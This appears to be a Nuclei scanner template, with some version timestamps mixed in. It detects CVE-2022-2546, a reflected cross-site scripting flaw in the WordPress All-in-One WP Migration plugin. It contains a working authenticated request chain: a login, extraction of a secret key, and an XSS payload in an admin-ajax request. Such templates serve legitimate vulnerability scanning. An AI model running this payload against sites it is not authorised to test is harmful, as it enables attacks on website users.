2022-09-25 07:25:10 +00:00
id : CVE-2022-2546
info :
name : All-in-One WP Migration plugin - Cross-Site Scripting (XSS)
author : theamanrawat
severity : medium
description : |
Reflected Cross-Site Scripting (XSS) vulnerability in WordPress All-in-One WP Migration plugin (versions <= 7.62).
reference :
- https://wpscan.com/vulnerability/f84920e4-a1fe-47cf-9ba5-731989c70f58
- https://wordpress.org/plugins/all-in-one-wp-migration/
- https://patchstack.com/database/vulnerability/all-in-one-wp-migration/wordpress-all-in-one-wp-migration-plugin-7-62-unauthenticated-reflected-cross-site-scripting-xss-vulnerability
- https://nvd.nist.gov/vuln/detail/CVE-2022-2546
2022-09-25 15:28:34 +00:00
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2546
2022-09-25 07:25:10 +00:00
classification :
cve-id : CVE-2022-2546
metadata :
verified : true
tags : cve,cve2022,wordpress,wp-plugin,wp,xss,all-in-one-wp-migration,authenticated
requests :
- raw :
- |
POST /wp-login.php HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
2022-09-25 09:33:33 +00:00
2022-09-25 07:25:10 +00:00
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/admin.php?page=ai1wm_export HTTP/1.1
Host : {{Hostname}}
- |
GET /wp-admin/admin-ajax.php?action=ai1wm_export&ai1wm_import=1&options%5Breplace%5D%5Bnew_value%5D%5B%5D=XSSPAYLOAD%3Csvg+onload=alert(document.domain)%3E&ai1wm_manual_export=1&secret_key={{secretkey}} HTTP/1.1
Host : {{Hostname}}
cookie-reuse : true
req-condition : true
matchers :
- type : dsl
dsl :
- contains(all_headers_3, "text/html")
- status_code_3 == 200
- contains(body_3, '{\"new_value\":[\"XSSPAYLOAD<svg onload=alert(document.domain)>')
condition : and
extractors :
- type : regex
name : secretkey
group : 1
regex :
- 'ai1wm_feedback"},"secret_key":"([0-9a-zA-Z]+)"'
2022-09-25 09:33:33 +00:00
internal : true
